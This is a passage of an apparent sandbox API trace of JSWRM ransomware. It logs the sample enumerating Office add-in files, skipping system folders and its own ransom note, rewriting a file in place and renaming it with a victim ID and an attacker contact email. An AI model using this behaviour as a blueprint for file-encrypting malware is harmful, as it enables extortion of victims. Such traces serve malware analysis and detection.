lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0126.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0126.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0126.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0126.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0126.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.249] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0126.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0126.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0126.249] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0126.249] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16651cf9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16651cf9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16677f4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1108, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="LocalizedStrings.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0126.249] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2=".") returned 1 [0126.249] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="..") returned 1 [0126.249] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="...") returned 1 [0126.250] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="windows") returned -1 [0126.250] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="recovery") returned -1 [0126.250] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="perflogs") returned -1 [0126.250] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="documents and settings") returned 1 [0126.250] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="$RECYCLE.BIN") returned 1 [0126.250] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="system volume information") returned -1 [0126.250] lstrcmpiW (lpString1="LocalizedStrings.xml", lpString2="msocache") returned -1 [0126.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0126.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x240f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0126.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0126.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedStrings.xml", cchWideChar=20, lpMultiByteStr=0x241358, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedStrings.xml", lpUsedDefaultChar=0x0) returned 20 [0126.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0126.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0126.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0126.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0126.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ee50 [0126.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\localizedstrings.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0126.251] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=4360) returned 1 [0126.251] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1100) returned 0x278330 [0126.251] ReadFile (in: hFile=0x338, lpBuffer=0x278330, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e1cc*=0x1100, lpOverlapped=0x0) returned 1 [0126.255] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0126.255] WriteFile (in: hFile=0x338, lpBuffer=0x278330*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e1c8*=0x1100, lpOverlapped=0x0) returned 1 [0126.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x278330 | out: hHeap=0x1e0000) returned 1 [0126.255] CloseHandle (hObject=0x338) returned 1 [0126.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f0d8 [0126.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0126.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0126.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0126.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0126.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0126.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0126.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0126.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0126.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0126.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0126.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0126.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0126.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0126.255] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\cs\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\cs\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0126.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0126.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f0d8 | out: hHeap=0x1e0000) returned 1 [0126.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ee50 | out: hHeap=0x1e0000) returned 1 [0126.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0126.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0126.256] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcb7dd00, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcb7dd00, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfcb7dd00, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.resources.dll", cAlternateFileName="MIE3DA~1.DLL")) returned 1 [0126.256] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2=".") returned 1 [0126.256] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="..") returned 1 [0126.256] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="...") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="windows") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="recovery") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="perflogs") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="documents and settings") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="system volume information") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.resources.dll", lpString2="msocache") returned -1 [0126.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0126.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0126.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d260, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0126.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0126.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0126.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0126.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.resources.dll", cchWideChar=47, lpMultiByteStr=0x22d0d8, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.resources.dll", lpUsedDefaultChar=0x0) returned 47 [0126.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0126.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23e228 [0126.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0126.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0126.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0126.257] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa853100, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa853100, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa879350, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x39088, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cAlternateFileName="MIDF86~1.DLL")) returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2=".") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="..") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="...") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="windows") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="recovery") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="perflogs") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="documents and settings") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="system volume information") returned -1 [0126.257] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpString2="msocache") returned -1 [0126.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0126.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0126.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20dde8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0126.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d578, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Common.Wizard.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f970 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0126.258] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf61d7668, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf61d7668, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf61d7668, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x13a90, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2=".") returned 1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="..") returned 1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="...") returned 1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="windows") returned -1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="recovery") returned -1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="perflogs") returned -1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="system volume information") returned -1 [0126.258] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpString2="msocache") returned -1 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0126.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d920, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0126.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0126.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", cchWideChar=54, lpMultiByteStr=0x20d770, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.BackEnd.resources.dll", lpUsedDefaultChar=0x0) returned 54 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0126.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0126.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0126.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0126.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0126.259] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x765018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x765018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x765018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ff030, dwReserved0=0x60002, dwReserved1=0x236ace, cFileName="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cAlternateFileName="MIF61E~1.DLL")) returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2=".") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="..") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="...") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="windows") returned -1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="recovery") returned -1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="perflogs") returned -1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="documents and settings") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="system volume information") returned -1 [0126.259] lstrcmpiW (lpString1="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpString2="msocache") returned -1 [0126.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0126.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0126.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0126.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", cchWideChar=62, lpMultiByteStr=0x20d920, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll", lpUsedDefaultChar=0x0) returned 62 [0126.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0126.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0126.259] WideCharToMultiByte (in: 